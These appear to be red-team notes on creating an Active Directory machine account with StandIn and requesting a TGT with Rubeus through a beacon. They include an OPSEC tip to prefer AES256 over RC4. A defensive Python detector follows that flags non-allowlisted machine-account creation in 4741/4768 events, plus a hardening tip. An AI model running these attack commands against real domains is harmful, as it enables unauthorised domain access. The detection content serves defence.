Any domain user may create machine accounts, up to a quota (ms-DS-MachineAccountQuota, default 10). To read the quota (replace the distinguished name with that of your domain):

powershell Get-DomainObject -Identity "DC=domain,DC=local" -Properties ms-DS-MachineAccountQuota

Use StandIn to create a machine account (note: specify the name without the trailing dollar sign). Record the password and the (sub)domain to which the computer belongs.

beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer [machine-name] --make

Determine the account hash with Rubeus:

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:[machine-account-pw] /user:[machine-account] /domain:[machine-domain]

Use the AES256 password hash to obtain a TGT (preferred over RC4 for OPSEC):

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[machine-account] /aes256:[aes256-hash] /nowrap
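Detection side of the sequence above, as an added example that is not part of the original notes: it flags machine accounts created by anyone outside a provisioning allowlist and attaches the TGT requests that follow for the new account. The events are constructed samples using the field names of Windows Security events 4741 and 4768; the allowlist, the account names and the one-hour window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs), using field names from Windows
# Security events 4741 (computer account created) and 4768 (TGT requested).
SAMPLE_EVENTS = [
    {"id": 4741, "time": "2024-05-01T10:00:00", "SubjectUserName": "svc-join",
     "TargetUserName": "WKSTN-07$"},
    {"id": 4741, "time": "2024-05-01T10:05:00", "SubjectUserName": "jsmith",
     "TargetUserName": "DESKTOP-X1$"},
    {"id": 4768, "time": "2024-05-01T10:07:30", "TargetUserName": "DESKTOP-X1$",
     "IpAddress": "10.0.5.23", "TicketEncryptionType": "0x12"},
    {"id": 4768, "time": "2024-05-01T10:09:00", "TargetUserName": "WKSTN-07$",
     "IpAddress": "10.0.5.40", "TicketEncryptionType": "0x12"},
]

# Assumption: the accounts that legitimately join machines in this environment.
PROVISIONING_ACCOUNTS = {"svc-join"}
ETYPES = {"0x11": "AES128", "0x12": "AES256", "0x17": "RC4"}


def find_suspect_machine_accounts(events, allow=PROVISIONING_ACCOUNTS,
                                  window=timedelta(hours=1)):
    """Flag machine accounts created by non-provisioning users and attach
    TGT requests made for each new account within `window` of its creation."""
    findings = []
    for ev in events:
        if ev["id"] != 4741 or ev["SubjectUserName"].lower() in allow:
            continue
        created = datetime.fromisoformat(ev["time"])
        account = ev["TargetUserName"].lower()
        tgts = [
            {"time": t["time"], "ip": t["IpAddress"],
             # AES256 (0x12) is also what a genuine host requests, so the etype
             # is context only; the creator is what drives the finding.
             "etype": ETYPES.get(t["TicketEncryptionType"], "other")}
            for t in events
            if t["id"] == 4768 and t["TargetUserName"].lower() == account
            and timedelta(0) <= datetime.fromisoformat(t["time"]) - created <= window
        ]
        findings.append({"account": ev["TargetUserName"],
                         "creator": ev["SubjectUserName"],
                         "created": ev["time"], "tgt_requests": tgts})
    return findings


if __name__ == "__main__":
    for f in find_suspect_machine_accounts(SAMPLE_EVENTS):
        print(f)
```

Setting ms-DS-MachineAccountQuota to 0 and delegating machine joins to a dedicated account shrinks the allowlist to that account, so every other 4741 creator becomes a finding.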